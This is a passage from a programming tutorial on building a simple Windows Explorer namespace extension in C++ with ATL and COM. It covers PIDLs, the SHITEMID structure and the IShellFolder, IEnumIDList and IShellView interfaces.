Prices and Yields Prices and yields of a sample of corporate bonds, December 2008. (jämför yield to maturity! Kapitalkostnad för företag!) Source: Bond transactions reported on FINRA’s TRACE service: 44
Similar presentations
© 2017 SlidePlayer.com Inc.
|
http://slideplayer.com/slide/2406055/
|
CC-MAIN-2017-22
|
refinedweb
| 1,546
| 64.2
|
Cover image credit: this amazing StackOverflow answer.
I've learned about closures a few different times, and each time, I've come away feeling like I get it, but I don't necessarily understand why people make such a big deal out of them. Yeah, hooray, you get functions that can persist their data! I've seen people post things like, "If you're not using closures, you're really missing out." I think I've finally figured out why people are so excited, and why I was confused. This post will explain what closures are, when you might want to use them, and why it took me so long to get why they're special.
What are Closures
A closure (also called a function closure or a lexical closure) is when you find a way of wrapping up a function with the state in which it was defined into one connected and persistent bundle. I'll show you a bunch of examples if that doesn't make sense. There's a number of ways to create a closure, but the canonical one is to define and return a function from within another function. Here's what I mean.
def build_zoo(): animals = [] def add_animal(animal): animals.append(animal) return animals return add_animal zoo_a = build_zoo() zoo_b = build_zoo() zoo_a("zebra") # => ["zebra"] zoo_a("monkey") # => ["zebra", "monkey"] zoo_b("snek") # => ["snek"] zoo_a("panda") # => ["zebra", "monkey", "panda"]
Thanks to @Doshirae and Nicholas Lee for pointing out a typo in the
return statement!
The
build_zoo function is a kind of "factory" that creates a scope and defines a function within that scope. Then it gives the function that still has access to that scope (and the variables therein) to you. After the
build_zoo function ends, it keeps the stack frame and variables defined (like
animals) available to the returned
add_animal function, for later reference. And every time you call this
build_zoo function, it creates a brand new scope, unconnected to any of the other scopes. That's why
zoo_a and
zoo_b were not able to affect each other when they were called!
Side Note: Python and Scopes
In Python, you are unable to modify variables outside your scope without extra work. So, if you tried something like this:
def build_incrementer(): current_value = 0 def increment(): current_value += 1 return current_value return increment incrementer = build_incrementer() incrementer() # => UnboundLocalError: local variable 'current_value' referenced before assignment
You get an error! This is not so in many languages. In many languages, it's ok to access variables in parent scopes. In Python, you'll have to do this:
def build_incrementer(): current_value = 0 def increment(): nonlocal current_value # <== current_value += 1 return current_value return increment
This lets you reach out and modify this value. You could also use global, but we're not animals, so we won't.
OK, but So What?
"You can keep track of state like a billion different ways!" you say exaggeratingly. "What's so special about closures? They seem unnecessarily complicated." And that's a little bit true. Generally, if I wanted to keep track of my state with a function, I would do it in one of a few different ways.
Generator Functions
def build_incrementer(): current_value = 0 while True: current_value += 1 yield current_value inc_a = build_incrementer() inc_b = build_incrementer() next(inc_a) # => 1 next(inc_a) # => 2 next(inc_a) # => 3 next(inc_b) # => 1
This method is very "Pythonic". It has no inner functions (that you know of), has a reasonably easy-to-discern flow-path, and (provided you understand generators), and gets the job done.
Build an Object
class Incrementer: def __init__(self): self.value = 0 def increment(self): self.value += 1 return self.value # Or, just so we can match the section above: def __next__(self): return self.increment() inc_a = Incrementer() inc_b = Incrementer() next(inc_a) # => 1 next(inc_a) # => 2 next(inc_b) # => 1
This is another good option, and one that also makes a lot of sense to me coming, having done a good amount of Ruby as well as Python.
Global Variables
current_value = 0 def increment(): global current_value current_value += 1 return current_value increment() # => 1 increment() # => 2 increment() # => 3
No.
But, I--
No.
Wait! Just let me--
Nope. Don't do it.
Global variables will work in very simple situations, but it's a really quick and easy way to shoot yourself in the foot when things get more complicated. You'll have seventeen different unconnected functions that all affect this one variable. And, if that variable isn't incredibly well named, it quickly becomes confusion and nonsense. And, if you made one, you probably made twenty, and now no-one but you knows what your code does.
Why Closures are Cool
Closures are exciting for three reasons: they're pretty small, they're pretty fast, and they're pretty available.
They're Small
Let's look at the rough memory usage of each method (except global variables) above:
import sys def build_function_incrementer(): # ... funky = build_function_incrementer() def build_generator_incrementer(): # ... jenny = build_generator_incrementer() class Incrementer: # ... classy = Incrementer() ### Functional Closure sys.getsizeof(build_function_incrementer) # The factory # => 136 sys.getsizeof(funky) # The individual closure # => 136 ### Generator Function sys.getsizeof(build_generator_incrementer) # The factory # => 136 sys.getsizeof(jenny) # The individual generator # => 88 ### Class sys.getsizeof(Incrementer) # The factory (class) # => 1056 sys.getsizeof(classy) # The instance # => 56
Surprisingly, the generator function's output actually ends up being the smallest. But both the generator function, and the traditional closure are much smaller than creating a class.
They're Fast
Let's see how they stack up, time-wise. Keep in mind, I'm going to use
timeit because it's easy, but it won't be perfect. Also, I'm doing this from my slowish little laptop.
import timeit ### Functional Closure timeit.timeit(""" def build_function_incrementer(): # ... funky = build_function_incrementer() for _ in range(1000): funky() """, number=1) # => 0.0003780449624173343 ### Generator Function timeit.timeit(""" def build_generator_incrementer(): # ... jenny = build_generator_incrementer() for _ in range(1000): next(jenny) """, number=1) # => 0.0004897500039078295 ### Class timeit.timeit(""" class Incrementer: def __init__(self): self.value = 0 def increment(self): self.value += 1 return self.value def __next__(self): return self.increment() classy = Incrementer() for _ in range(1000): next(classy) """, number=1) # => 0.001482799998484552
Once again, the class method comes in at the bottom, but this time we see a marginal speed bump with the functional closure. However, keep in mind, the final argument for closures is the strongest one.
They're Available
This is the one that took me the longest to find out. Not all languages are as lucky as Python. (Excuse me while I prepare my inbox for a deluge of hate mail.) In Python, we are lucky enough to have Generators as well as a number of ways to create them, like Generator functions. Honestly, if I had to choose from the above methods, and I was writing Python, I'd actually recommend the Generator Function method since it's easier to read and reason about.
However, there are a lot of languages that aren't as "batteries included." This can actually be a benefit if you want a small application size, or if you're constrained somehow. In these cases, as long as your language supports creating functions, you should be able to get all the benefits of Generators (lazy evaluation, memoization, the ability to iterate through a possibly infinite series…) without any fancy features.
In JavaScript, you can now use a version of generators, but that's ES6 functionality that hasn't always been there. As far as I can tell, this isn't a built-in functionality in Go either (although some research shows that it might be more idiomatic to use channels instead). I'm sure there are many other lower-level languages as well where a simple function closure is easier than trying to write your own Generator.
Share Your Wisdom!
Since I don't have a whole lot of experience with low-level languages, the pros and cons of closures are new to me. If you have some better explanations or any examples of when a closure is the perfect tool for the job, please let me know about it or comment below and I'll do my best to broadcast your wisdom.
Originally posted on
assert_not magic?
What Makes an Environment Inclusive?
What makes a work environment inclusive to you? What does it take?
Polyglot Tinkering - Moving to Firefox with Python
Peter Aba - May 13
My favorite technology-related podcasts
Mateusz Bełczowski - May 12
Snake case to camel case and back using regular expressions and Python
Raunak Ramakrishnan - May 10
Django Quick Tip #1: Human Friendly Timestamps with Django's Humanize
Emmanuel Okiche - May 15
There's no reason why global functions with global variables can't be considered closures as well. They wrap up their state in the function. This is particularly true when exporting functions from modules.
In Leaf I consider closures and instance functions to be basically the same. A closure is merely a class instance with an implicit
this. Under the hood there's not much difference at all.
Interesting. I never thought about it like that before. That’s some great under-the-hood knowledge to have. Although instantiating a closure’s state by importing a module (if that state is intended to be mutable) makes my programmy danger sense tingle a little bit.
I love closures and find myself reaching for them often. The only time I've noticed that they don't work for me is when I'm multiprocessing as they won't pickle. In those situations, I have to fall back to the class approach. Maybe I just haven't found the right magic to make them work in process pools, so hopefully someone can point me in the right direction.
If you like closures, try one of the more functional oriented languages (or techniques, since Python also support functions as first class objects). It takes to the next level of thinking and help you write even more concise/elegant code.
Check out the Toolz library for functional techniques written in Python. My favorites are pipe, curry, and compose.
toolz.readthedocs.io/en/latest/api...
It also has the same API implemented in C in the CyToolz library. think there is a typo in the first example, it build_zoo should return add_animal. Thanks for writing this article it was a good read!
Thanks! I had somebody on Twitter point that out too. I’ll fix it now.
|
https://dev.to/rpalo/closure-i-hardly-know-her--1h40
|
CC-MAIN-2018-22
|
refinedweb
| 1,722
| 57.27
|
Opened 14 years ago
Closed 13 years ago
Last modified 13 years ago
#152 closed (duplicate)
FCGI server for django
Description
Maybe the FCGI-WSGI-Server at might be useable for django? A runfcgi command for django-admin might run along the following lines:
def runfcgi(): "Starts a FCGI server for production use" from django.core.servers.fcgi import WSGIServer from django.core.handlers.wsgi import WSGIHandler WSGIServer(WSGIHandler()).run() runfcgi.args = ''
Attachments (1)
Change History (7)
comment:1 Changed 14 years ago by
Changed 14 years ago by
FCGI server script
comment:2 Changed 14 years ago by
I added a script that starts a django project setting as a remote FCGI server on either a socket or a ip:port. This can be used to run django projects under their own user ID behind a webserver that itself runs under different rights or could be used in conjunction with some dispatching tool for load balancing a django installation.
The script works fine with Python 2.4. But it uses the preforked FCGI server from Flup (to better make use of SMP machines - due to the GIL, python threading doesn't help there) and that one uses socketpair. So to get it working with Python 2.3 you additionally need the Eunuchs package, because Python 2.3 doesn't have socket.socketpair.
The two packages can be found here:
Flup:
Eunuchs:
Just start the django-fcgi.py without parameters to get a short help on what you can give as options.
comment:3 Changed 14 years ago by
Ok, I have a documentation up how to use the script:. This document goes into more detail and gives a much nicer configuration, I think.
comment:4 Changed 13 years ago by
The most current scripts are in my repository.
I have written a short description on how to get Django running with FCGI at. Please have a look and feel free to steal anything you need for your documentation :-)
It's only a first take but should be enough to get people up and running with lighttpd and so should give a nice alternative for mod_python (especially for people still running apache 1.3, since they can't run the needed mod_python version).
|
https://code.djangoproject.com/ticket/152
|
CC-MAIN-2019-09
|
refinedweb
| 373
| 61.46
|
Introduction on a Matplotlib plot, that allows us to mark and highlight certain regions of the plot, without zooming or changing the axis range.
Creating a Plot
Let's first create a simple plot with some random data:
import matplotlib.pyplot as plt import numpy as np fig, ax = plt.subplots(figsize=(12, 6)) np.random.seed(42) x = np.random.rand(150) ax.plot(x) plt.show()
Here, we've used Numpy to generate 150 random data points, in a range of
[0, 1).
Now, since we've set a
seed, we can replicate this random image as many times as we'd like. For example, let's draw vertical lines on the
20 and
100 marks.
There are two ways we can draw lines, using the
vlines() or
axvline() functions of the PyPlot instance. Naturally, you can also call these methods on the
Axes object.
Draw Vertical Lines on Matplotlib Plot with PyPlot.vlines()
Let's start off with the
vlines() function:
import matplotlib.pyplot as plt import numpy as np fig, ax = plt.subplots(figsize=(12, 6)) np.random.seed(42) x = np.random.rand(150) ax.plot(x) ax.vlines([20, 100], 0, 1, linestyles='dashed', colors='red') plt.show()
The
vlines() function accepts a few arguments - a scalar, or 1D array of X-values that you'd like to draw lines on. We've supplied
[20, 100], marking two points, though you can go from
0..n points here. Then, the
ymin and
ymax arguments - these are the height of the lines. We've set them to be from
0 to
1, since that's the distribution of the
np.random.rand() call as well. Then, you can set styles, such as
linestyles or
colors, which accept the typical Matplotlib styling options.
Running this code will result in:
We've got two vertical lines, which are dashed, in red color, at the
20 and
100 points on the X-axis.
This function allows us to set the
ymin and
ymax in concrete values, while
axvline() lets us choose the height percentage-wise, or we simply let it plot from the bottom to the top by default.
This feature comes in handy when you'd like to make the lines shorter or longer, for example. Let's change the range of our Y-axis, to include the view from
-10 to
10, instead of
0 and
1. Our random data will still be in the range from
[0, 1) so we'll have a better look at it from a different perspective:
fig, ax = plt.subplots(figsize=(12, 6)) np.random.seed(42) x = np.random.rand(150) ax.plot(x) ax.set_ylim(-10, 10) ax.vlines([20, 100], -2, 2, linestyles='dashed', colors='red')
Here, we've set the lines to be longer than the range of the random data itself, but still much smaller than the size of the
Axes itself.
Draw Vertical Lines on Matplotlib Plot with PyPlot.axvline()
Now, let's take a look at the
axvline() function:
fig, ax = plt.subplots(figsize=(12, 6)) np.random.seed(42) x = np.random.rand(150) ax.plot(x) ax.set_ylim(-10, 10) ax.axvline(20, color='red') ax.axvline(100, color='red') plt.show()
It has a few limitations that the other function doesn't have, such as being able to only plot on a single point at a time. If we want to plot on multiple points, such as
20 and
100, we'll have to call the function twice.
It also doesn't really let us specify the
linestyle like
vlines() let us, though, it doesn't require the
ymin and
ymax arguments by default. If you omit them, like we have, they'll simply be from the top to the bottom of the
Axes:
However, you can change the height if you'd like - this time around though, you'll change the height in terms of percentages. These percentages take the top and bottom of the
Axes into consideration so 0% will be at the very bottom, while 100% will be at the very top. Let's draw a line spanning from 50% to 80%:
fig, ax = plt.subplots(figsize=(12, 6)) np.random.seed(42) x = np.random.rand(150) ax.plot(x) ax.set_ylim(-10, 10) ax.axvline(20, 0.8, 0.5, color='red') ax.axvline(100, 0.8, 0.5, color='red')
This produces:
Conclusion
In this tutorial, we've gone over how to draw vertical lines on a Matplotlib Plot..
|
https://stackabuse.com/matplotlib-draw-vertical-lines-on-plot/
|
CC-MAIN-2021-17
|
refinedweb
| 755
| 75.61
|
Developer Needed...
- Chris Mckevitt last edited by
the way npp displays folds is annoying. from the visible fold line, to not being able to easily delete the fold etc…
I have no experience in plugins/etc, but I know what I want npp to do. I would like the folds to resemble this:
+function(){…}
+function(){…}
as opposed to:
+function(){
|----------------------------------------
+function(){
|----------------------------------------
How would I go about achieving this, or better yet, which one of you will do it for me so as to learn from example?!..
- Claudia Frank last edited by
the problems are
a) it is handled by scintilla
and
b) I assume a couple of lexer do it differently.
So I guess there isn’t a quick solution for you. Sorry.
Cheers
Claudia
- Chris Mckevitt last edited by
Thanks Claudia… Maybe we can hasten the solution if you would please explain you answers a little more. I’m don’t really know much about scintilla and lexers and as such, don’t understand the depth of your answers. Maybe a quick side note on how the scintilla handles it and how & why lexers are different?
- Claudia Frank last edited by
Scintilla is the component which
is used by notepad++ to do all the coloring, folding, styling, … stuff of your language.
A lexer is the component which calculates which parts should be colored, folded, styled etc…
Scintilla itself has already a lot of builtin lexers but it also provides an interface for writing
own lexers e.g. the UDL from npp. Those lexers are written by different programmers,
although they may use the same scintilla version they are slightly different in functionality
and representation. E.g. put the following python code into a doc and set the lexer to python
def foo(): # comment pass
you will see that folding starts from line 1 and includes line 3.
Use this vbs code and do the same (except you want select visual basic as lexer)
Sub Foo() 'comment End Sub
You will see that folding starts also at line 1 but doesn’t include the last line.
Even more critical is when pasting this, which from vbs syntax view is absolutely ok, into a doc.
Sub Foo() 'comment End Sub
This results in no folding at all. Why? Because the visual basic lexer programmer decided to
write the folding logic based on indention and not doing complex code analysis.
Which is fine, as long as the vbs user does the same kind of code styling.
So you see, even if one of the language lexer you use behaves the way you like,
there is no guarantee that others act the same.
When you want to write your own lexer than I would recommend to check the code of one of the existing lexers.
This Gmod LUA plugin is known to be a good example but must admit that I never used or checked the code myself.
Cheers
Claudia
|
https://community.notepad-plus-plus.org/topic/12094/developer-needed
|
CC-MAIN-2019-47
|
refinedweb
| 486
| 65.25
|
0 Marcial 6 Years Ago I wrote the code below and it runs well. However, how do I make it so that 'Jeanne' enters her own name instead of the numeral 01 to get the message 'Welcome Jeanne'? Thank you. // This program assigns a code to 'Jeanne' (analogous to a pass code) Actual program starts just below #include "stdafx.h" #include <iostream> using namespace std; int _tmain(int argc, _TCHAR* argv[]) { int counter=0; int code; cout<<"Please enter your code\n"; cin>>code; do { // 'do' opens while (code!=01) { // 'while' opens cout<<"Please enter correct code\n"; cin>>code; if (code==01) cout<<"Welcome Jeanne\n"; } // 'while' closes } // 'do' closes while (counter<=4); return 0; } c++ Edited 6 Years Ago by WaltP: Fixed CODE Tags -- you ARE allowed to Edit your post to make it look correct.
|
https://www.daniweb.com/programming/software-development/threads/352312/c-how-do-i-use-a-name-instead-of-a-number-for-a-cin-value
|
CC-MAIN-2017-17
|
refinedweb
| 138
| 63.22
|
The document contains a quick introduction to the basic concepts, and then a walk-through development of a simple application using the Xapian library, together with commentary on how the application could be taken further. It deliberately avoids going into a lot of detail - see the rest of the documentation for more detail.
Before following the steps outlined in this document, you will need to have the Xapian library installed on your system. For instructions on obtaining and installing Xapian, read the Installation document.
An information retrieval system using Xapian typically has two parts. The first part is the indexer, which takes documents in various formats, processes them so that they can be efficiently searched, and stores the processed documents in an appropriate data structure (the database). The second part is the searcher, which takes queries and reads the database to return a list of the documents relevant to each query.
The database is the data structure which ties the indexer and searcher together, and is fundamental to the retrieval process. Given how fundamental it is, it is unsurprising that different applications put different demands on the database. For example, some applications may be happy to deal with searching a static collection of data, but need to do this extremely fast (for example, a web search engine which builds new databases from scratch nightly or even weekly). Other applications may require that new data can be added to the system incrementally, but don't require extremely high performance searching (perhaps an email system, which is only being searched occasionally). There are many other constraints which may be placed on an information retrieval system: for example, it may be required to have small database sizes, even at the expense of getting poorer results from the system.
To provide the required flexibility, Xapian has the ability to use one of many available database backends, each of which satisfies a different set of constraints, and stores its data in a different way. Currently, these must be compiled into the whole system, and selected at runtime, but the ability to dynamically load modules for each of these backends is likely to be added in future, and would require little design modification.
We now present sample code for an indexer. This is deliberately simplified to make it easier to follow. You can also read it in an HTML formatted version.
The "indexer" presented here is simply a small program which takes a path to a database and a set of parameters defining a document on the command line, and stores that document as a new entry in the database.
The first requirement in any program using the Xapian library is to include the Xapian header file, "xapian.h":
#include <xapian.h>
We're going to use C++ iostreams for output, so we need to include the iostream header, and we'll also import everything from namespace std for convenience:
#include <iostream> using namespace std;
Our example only has a single function, main(), so next we define that:
int main(int argc, char **argv)
For this example we do very simple options parsing. We are going to use the core functionality of Xapian of searching for specific terms in the database, and we are not going to use any of the extra facilities, such as the keys which may be associated with each document. We are also going to store a simple string as the data associated with each document.
Thus, our command line syntax is:
The validity of a command line can therefore be checked very simply by ensuring that there are at least 3 parameters:
if (argc < 4) { cout << "usage: " << argv[0] << " <path to database> <document data> <document terms>" << endl; exit(1); }
When an error occurs in Xapian it is reported by means of the C++ exception mechanism. All errors in Xapian are derived classes of Xapian::Error, so simple error handling can be performed by enclosing all the code in a try-catch block to catch any Xapian::Error exceptions. A (hopefully) helpful message can be extracted from the Xapian::Error object by calling its get_msg() method, which returns a human readable string.
Note that all calls to the Xapian library should be performed inside a try-catch block, since otherwise errors will result in uncaught exceptions; this usually results in the execution aborting.
Note also that Xapian::Error is a virtual base class, and thus can't be copied: you must therefore catch exceptions by reference, as in the following example code:
try { [code which accesses Xapian] } catch (const Xapian::Error & error) { cout << "Exception: " << error.get_msg() << endl; }
In Xapian, a database is opened for writing by creating a Xapian::WritableDatabase object.
If you pass Xapian::DB_CREATE_OR_OPEN and there isn't an existing database in the specified directory, Xapian will try to create a new empty database there. If there is already database in the specified directory, it will be opened.
If an error occurs when trying to open a database, or to create a new database, an exception, usually of type Xapian::DatabaseOpeningError or Xapian::DatabaseCreateError, will be thrown.
The code to open a database for writing is, then:
Xapian::WritableDatabase database(argv[1], Xapian::DB_CREATE_OR_OPEN);
Now that we have the database open, we need to prepare a document to put in it. This is done by creating a Xapian::Document object, filling this with data, and then giving it to the database.
The first step, then, is to create the document:
Xapian::Document newdocument;
Each Xapian::Document has a "cargo" known as the document data. This data is opaque to Xapian - the meaning of it is entirely user-defined. Typically it contains information to allow results to be displayed by the application, for example a URL for the indexed document and some text which is to be displayed when returning the document as search result.
For our example, we shall simply store the second parameter given on the command line in the data field:
newdocument.set_data(string(argv[2]));
The next step is to put the terms which are to be used when searching for the document into the Xapian::Document object.
We shall use the add_posting() method, which adds an occurrence of a term to the struct. The first parameter is the "termname", which is a string defining the term. This string can be anything, as long as the same string is always used to refer to the same term. The string will often be the (possibly stemmed) text of the term, but might be in a compressed, or even hashed, form. Most backends impose a limit on the length of a termname (for chert the limit is 245 bytes).
The second parameter is the position at which the term occurs within the document. These positions start at 1. This information is used for some search features such as phrase matching or passage retrieval, but is not essential to the search.
We add postings for terms with the termname given as each of the remaining command line parameters:
for (int i = 3; i < argc; ++i) { newdocument.add_posting(argv[i], i - 2); }
Finally, we can add the document to the database. This simply involves calling Xapian::WritableDatabase::add_document(), and passing it the Xapian::Document object:
database.add_document(newdocument);
The operation of adding a document is atomic: either the document will be added, or an exception will be thrown and the document will not be in the new database.
add_document() returns a value of type Xapian::docid. This is the document ID of the newly added document, which is simply a handle which can be used to access the document in future.
Note that this use of add_document() is actually fairly inefficient: if we had a large database, it would be desirable to group as many document additions together as possible, by encapsulating them within a session. For details of this, and of the transaction facility for performing sets of database modifications atomically, see the API Overview.
Now we show the code for a simple searcher, which will search the database built by the indexer above. Again, you can read an HTML formatted version.
The "searcher" presented here is, like the "indexer", simply a small command line driven program. It takes a path to a database and some search terms, performs a probabilistic search for documents represented by those terms and displays a ranked list of matching documents.
Just like "quickstartindex", we have a single-function example. So we include the Xapian header file, and begin:
#include <xapian.h> int main(int argc, char **argv) {
Again, we are going to use no special options, and have a very simple command line syntax:
The validity of a command line can therefore be checked very simply by ensuring that there are at least 2 parameters:
if (argc < 3) { cout << "usage: " << argv[0] << " <path to database> <search terms>" << endl; exit(1); }
Again, this is performed just as it was for the simple indexer.
try { [code which accesses Xapian] } catch (const Xapian::Error & error) { cout << "Exception: " << error.get_msg() << endl; }
Xapian has the ability to search over many databases simultaneously, possibly even with the databases distributed across a network of machines. Each database can be in its own format, so, for example, we might have a system searching across two remote databases and a flint database.
To open a single database, we create a Xapian::Database object, passing the path to the database we want to open:
Xapian::Database db(argv[1]);
You can also search multiple database by adding them together using Xapian::Database::add_database:
Xapian::Database databases; databases.add_database(Xapian::Database(argv[1])); databases.add_database(Xapian::Database(argv[2]));
All searches across databases by Xapian are performed within the context of an "Enquire" session. This session is represented by a Xapian::Enquire object, and is across a specified collection of databases. To change the database collection, it is necessary to open a new enquire session, by creating a new Xapian::Enquire object.
Xapian::Enquire enquire(databases);
An enquire session is also the context within which all other database reading operations, such as query expansion and reading the data associated with a document, are performed.
We are going to use all command line parameters from the second onward as terms to search for in the database. For convenience, we shall store them in an STL vector. This is probably the point at which we would want to apply a stemming algorithm, or any other desired normalisation and conversion operation, to the terms.
vector<string> queryterms; for (int optpos = 2; optpos < argc; optpos++) { queryterms.push_back(argv[optpos]); }
Queries are represented within Xapian by Xapian::Query objects, so the next step is to construct one from our query terms. Conveniently there is a constructor which will take our vector of terms and create an Xapian::Query object from it.
Xapian::Query query(Xapian::Query::OP_OR, queryterms.begin(), queryterms.end());
You will notice that we had to specify an operation to be performed on the terms (the Xapian::Query::OP_OR parameter). Queries in Xapian are actually fairly complex things: a full range of boolean operations can be applied to queries to restrict the result set, and probabilistic weightings are then applied to order the results by relevance. By specifying the OR operation, we are not performing any boolean restriction, and are performing a traditional pure probabilistic search.
We now print a message out to confirm to the user what the query being performed is. This is done with the Xapian::Query::get_description() method, which is mainly included for debugging purposes, and displays a string representation of the query.
cout << "Performing query `" << query.get_description() << "'" << endl;
Now, we are ready to perform the search. The first step of this is to give the query object to the enquire session:
enquire.set_query(query);
Next, we ask for the results of the search, which implicitly performs the the search. We use the get_mset() method to get the results, which are returned in an Xapian::MSet object. (MSet for Match Set)
get_mset() can take many parameters, such as a set of relevant documents to use, and various options to modify the search, but we give it the minimum, which is the first document to return (starting at 0 for the top ranked document), and the maximum number of documents to return (we specify 10 here):
Xapian::MSet matches = enquire.get_mset(0, 10);
Finally, we display the results of the search. The results are stored in in the Xapian::MSet object, which provides the features required to be an STL-compatible container, so first we display how many items are in the MSet:
cout << matches.size() << " results found" << endl;
Now we display some information about each of the items in the Xapian::MSet. We access these items using an Xapian::MSetIterator:
Xapian::MSetIterator i; for (i = matches.begin(); i != matches.end(); ++i) { cout << "Document ID " << *i << "\t"; cout << i.get_percent() << "% "; Xapian::Document doc = i.get_document(); cout << "[" << doc.get_data() << "]" << endl; }
Now that we have the code written, all we need to do is compile it!
A small utility, "xapian-config", is installed along with Xapian to assist you in finding the installed Xapian library, and in generating the flags to pass to the compiler and linker to compile.
After a successful compilation, this utility should be in your path, so you can simply run
xapian-config --cxxflags
to determine the flags to pass to the compiler, and
xapian-config --libs
to determine the flags to pass to the linker. These flags are returned on the utility's standard output (so you could use backtick notation to include them on your command line).
If your project uses the GNU autoconf tool, you may also use the XO_LIB_XAPIAN macro, which is included as part of Xapian, and will check for an installation of Xapian and set (and AC_SUBST) the XAPIAN_CXXFLAGS and XAPIAN_LIBS variables to be the flags to pass to the compiler and linker, respectively.
If you don't use GNU autoconf, don't worry about this.
Once you know the compilation flags, compilation is a simple matter of invoking the compiler! For our example, we could compile the two utilities (quickstartindex and quickstartsearch) with the commands:
c++ `xapian-config --cxxflags` quickstartindex.cc `xapian-config --libs` -o quickstartindex c++ `xapian-config --cxxflags` quickstartsearch.cc `xapian-config --libs` -o quickstartsearch
Once we have compiled the above examples, we can build up a simple database as follows.
$ ./quickstartindex proverbs \ > "people who live in glass houses should not throw stones" \ > people live glass house stone $ ./quickstartindex proverbs \ > "Don't look a gift horse in the mouth" \ > look gift horse mouth
For the first command, the database directory doesn't already exist, so Xapian will create it and also create the database files inside it. For the second command, it will use the database which now exists, so we should now have a database with a couple of documents in it. Looking in the database directory, you should see something like:
$ ls proverbs/ [some files]
Given the small amount of data in the database, you may be concerned that the total size of these files is a little over 32KB. Be reassured that the database is block structured, here consisting of largely empty blocks, and will behave much better for large databases.
We can now perform searches over the database using the quickstartsearch program.
$ ./quickstartsearch proverbs look Performing query `look' 1 results found Document ID 2 50% [Don't look a gift horse in the mouth]
|
http://xapian.org/docs/quickstart.html
|
CC-MAIN-2014-35
|
refinedweb
| 2,574
| 57.71
|
From the shell's point of view, the contents of your computer -- hard drives, CD-ROMs, mapped network drives, the desktop, and so on -- are arranged in one large tree, with the desktop as the topmost node, called the shell namespace. Explorer provides a means to insert custom objects into the namespace via namespace extensions. In this article, I'll cover the steps involved in making a basic, simple namespace extension. Our extension will create a virtual folder that lists the drives on the computer, similar to the My Computer list pictured below.
The article assumes you know C++, ATL, and COM. Familiarity with shell extensions is also helpful.
I realize this is a really long article, but namespace extensions are extremely complicated and the best documentation I could find was the comments in the RegView sample in MSDN (67K). That sample is functional, but it does nothing to explain the internal sequence of events in namespaces. Dino Esposito's great book Visual C++ Windows Shell Programming sheds a bit more light, and includes a WinView sample (download source, 1 MB) which is based on RegView. I took the information in those two sources, threw in tons of trace messages to see the logic flow, and compiled it all in this article.
The sample project included with this article is a basic extension; it does very little, yet it is fully functional. (Even a "simple" extension required all you see here in this article.) I purposely avoided some topics -- such as subfolders in a namespace, and interacting with other parts of the namespace -- since that would have only made the article longer, and the code more complicated. I may cover those topics in future articles.
The familiar two-pane view of Explorer is actually composed of several parts, all of which are important to a namespace extension. The parts are illustrated below:
In the picture above, the items like Control Panel and Registry View are virtual folders. These do not show part of the file system, but rather are folder-like UIs that expose some sort of functionality provided by namespace extensions. An extension shows its UI in the right pane, called the shell view. An extension can also manipulate Explorer's menu, toolbar, and status bar using a COM interface that Explorer provides. Explorer manages the tree view, where it shows the namespace, and an extension's control over the tree is limited to showing subfolders.
The internal structure of a namespace extension is, of course, dependent on the compiler and programming language you use. However, there is one important common element, the PIDL. PIDL (rhymes with "fiddle") stands for pointer to an ID list, and is the data structure Explorer uses to organize the items and sub-folders that are shown in the tree view. While the exact format of the data is up to the extension to define, there are a few rules regarding how the data is organized in memory. These rules define a generic format for PIDLs so that Explorer can deal with PIDLs from any extension, without regard for its internal structure.
I know that's rather vague, but for now, suffice it to say that PIDLs are how an extension stores data meaningful to itself. I will cover all the details of PIDLs, and how to construct them, later on in this article.
The other major part of an extension is the COM interfaces it must implement. The required interfaces are:
IShellFolder: Provides a communication channel between Explorer and the code implementing the virtual folder.
IEnumIDList: A COM enumerator that lets Explorer or the shell view enumerate the contents of the virtual folder.
IShellView: Manages a window that appears in the right pane of Explorer.
More complex extensions can also implement interfaces that customize the tree view side of Explorer, however, I will not cover those interfaces in this article, since the extension presented here is purposely being kept simple.
Every item in Explorer's namespace, whether it's a file, directory, Control Panel applet, or an object exposed by an extension, can be uniquely specified by its PIDL. An absolute PIDL of an object is analogous to a fully-qualified path to a file; it is the object's own PIDL and the PIDLs of all its parent folders concatenated together. So for example, the absolute PIDL to the System Control Panel applet can be thought of as
[Desktop]\[My Computer]\[Control Panel]\[System applet].
A relative PIDL is just the object's own PIDL, relative to its parent folder. Such a PIDL is only meaningful to the virtual folder that contains the object, since that folder is the only thing that can understand the data in the PIDL.
The extension in this article deals with relative PIDLs, because no communication happens with other parts of the namespace. (Doing so would require constructing absolute PIDLs.)
A PIDL is a structure analogous to a singly-linked list, only without pointers. A PIDL consists of a series of
ITEMIDLIST structures, placed back-to-back in a contiguous memory block. An
ITEMIDLIST only has one member, a
SHITEMID structure:
typedef struct _ITEMIDLIST { SHITEMID mkid; } ITEMIDLIST;
The definition of
SHITEMID is:
typedef struct _SHITEMID { USHORT cb; // Size of the ID (including cb itself) BYTE abID[1]; // The item ID (variable length) } SHITEMID;
The
cb member holds the size of the entire
struct, and functions like a "next" pointer in singly-linked lists. The
abID member is where a namespace extension stores its own private data. This member is allowed to be any length; the value of
cb indicates its exact size. So for example, if an extension stored 12 bytes of data,
cb would be 14 (12 +
sizeof(USHORT)). The data stored at
abID can be anything meaningful to the namespace, however, no two objects in a folder can have the same data, just as no two files in a directory can have the same filename.
The end of the PIDL is indicated by a
SHITEMID
struct with
cb set to 0, just as linked lists use a NULL next pointer to indicate the end of the list.
Here is a sample PIDL containing only one block of data, with a variable
pPidl pointing at the start of the list.
Notice how we can move from one
SHITEMID
struct to the next by adding each
struct's
cb value to the pointer.
Now, you may be asking what good is a
SHITEMID or a PIDL if Explorer doesn't know the data format. The answer is, Explorer views PIDLs as opaque data types that it only passes around to namespaces. They are much like handles in this regard. When you have, say an
HWND, you don't care what the internal data structure behind a window is, but you know you can do everything with a window by passing its handle back to the OS. PIDLs are the opposite - Explorer doesn't know the data underlying a PIDL, but it can interact with namespaces by passing PIDLs to them.
As mentioned above, the data used to identify an item in a namespace's folder needs to be unique within that folder. Fortunately, there is already a unique identifier for drives, the drive letter, so all we need to store in the
abID field is the letter. Our PIDL data is defined as a
PIDLDATA
struct:
struct PIDLDATA { TCHAR chDriveLtr; };
IEnumIDList is an implementation of a COM enumerator that enumerates over a collection of PIDLs. A COM enumerator implements functions that allow sequential access to a collection, much like an
iterator in STL collections. ATL provides classes that implement the enumerator for us, so all we have to do is provide the collection of data and tell ATL how to copy PIDLs.
IEnumIDList is used in two cases:
Since our extension contains no subfolders, we will only run into case 1.
IShellFolder is the interface that Explorer uses to initialize and communicate with an extension. Explorer calls
IShellFolder methods when it's time for the extension to create its view window.
IShellFolder also has methods to enumerate the contents of an extension's virtual folder, and compare two items in the folder for sorting purposes.
